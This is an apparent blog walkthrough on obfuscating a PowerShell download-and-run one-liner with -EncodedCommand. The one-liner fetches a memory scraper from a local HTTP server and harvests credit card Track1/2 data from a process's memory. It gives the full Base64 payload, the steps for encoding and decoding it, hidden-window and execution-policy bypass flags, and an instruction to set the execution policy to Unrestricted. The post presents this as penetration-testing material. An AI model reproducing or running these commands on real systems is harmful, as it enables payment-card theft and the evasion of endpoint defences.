Obfuscated PowerShell Memory Scraping for Credit Cards

Original Source & Inspiration: http://www.shellntel.com/blog/2015/9/16/powershell-cc-memory-scraper

* Non-resident credit card memory scraper, now improved the obfuscation technique using -EncodedCommand
* One-liner PowerShell script/downloader essentially does its dirty work without any additional malware corpus on the host
* Great for penetration tests of various merchants or for PCI-DSS audit compliance

  • ​​(1) Setup a server with the Memory Scraper download
  • (2) Encode the PowerShell memory scraper using -EncodedCommand (Base64)
  • (3) Allow execution of scripts on the host via powershell.exe Set-ExecutionPolicy Unrestricted
  • (4) Execute the obfuscated script on the host​ that downloads the memory scraper and parses the memory process of notepad.exe for credit card Track1/2 data with Luhn algorithm

 -NoP -NonI -W Hidden -Enc 

  • powershell.exe  -exec bypass -NoP -NonI -W Hidden -Enc “KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADkAMwA6ADgAMAAwADAALwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACwAJwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACkAOwAuAC8AbQBlAG0AXwBzAGMAcgBhAHAAZQByAC4AcABzADEAIAAtAFAAcgBvAGMAIABuAG8AdABlAHAAYQBkADsA”
Picture

(1) On the server, set up a lightweight HTTP server

  • copy contents and python -m SimpleHTTPServer

(2) Encode the PowerShell memory scraper using -EncodedCommand (Base64);

Picture

The following PowerShell is going to be encoded using -EncodedCommand instead of -Command:

  • powershell.exe -exec bypass -Command “(New-Object Net.WebClient).DownloadFile(‘http://192.168.0.193:8000/mem_scraper.ps1′,’mem_scraper.ps1′);./mem_scraper.ps1 -Proc notepad;)”

Referencehttps://blogs.msdn.microsoft.com/timid/2014/03/26/powershell-encodedcommand-and-round-trips/

  • EncodedCommand

    Accepts a base-64-encoded string version of a command. Use this parameter
    to submit commands to Windows PowerShell that require complex quotation
    marks or curly braces

​# To use the -EncodedCommand parameter:
    $command = “(New-Object Net.WebClient).DownloadFile(‘http://192.168.0.193:8000/mem_scraper.ps1′,’mem_scraper.ps1′);./mem_scraper.ps1 -Proc notepad;)”
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
    $encodedCommand = [Convert]::ToBase64String($bytes) ”’KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADkAMwA6ADgAMAAwADAALwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACwAJwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACkAOwAuAC8AbQBlAG0AXwBzAGMAcgBhAHAAZQByAC4AcABzADEAIAAtAFAAcgBvAGMAIABuAG8AdABlAHAAYQBkADsA”’ # Base64-Encoded Command
powershell.exe -encodedCommand $encodedCommand # Test

Here is the reverse process:
$decodedCommand = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64));
($command = “New-Object Net.WebClient).DownloadFile(‘http://192.168.0.193:8000/mem_scraper.ps1′,’mem_scraper.ps1’);./mem_scraper.ps1 -Proc notepad;”$bytes = [System.Text.Encoding]::Unicode.GetBytes($command);$encodedCommand = [Convert]::ToBase64String($bytes);powershell.exe -encodedCommand $encodedCommand)

Picture

The final obfuscated PowerShell one-liner is as follows:

  • powershell.exe -exec bypass -EncodedCommand”KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADkAMwA6ADgAMAAwADAALwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACwAJwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACkAOwAuAC8AbQBlAG0AXwBzAGMAcgBhAHAAZQByAC4AcABzADEAIAAtAFAAcgBvAGMAIABuAG8AdABlAHAAYQBkADsA”​

(3) Allow execution of scripts on the host via powershell.exe Set-ExecutionPolicy Unrestricted
The Set-ExecutionPolicy cmdlet enables you to determine which Windows PowerShell scripts (if any) will be allowed to run on your computer. Windows PowerShell has four different execution policies:

  • Restricted – No scripts can be run. Windows PowerShell can be used only in interactive mode.
  • AllSigned – Only scripts signed by a trusted publisher can be run.
  • RemoteSigned – Downloaded scripts must be signed by a trusted publisher before they can be run.
  • Unrestricted – No restrictions; all Windows PowerShell scripts can be run.

Reference: https://technet.microsoft.com/en-us/library/ee176961.aspx

(4) Execute the obfuscated script on the host​ that downloads the memory scraper and parses the memory process of notepad.exe for credit card Track1/2 data with Luhn algorithm

Picture


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s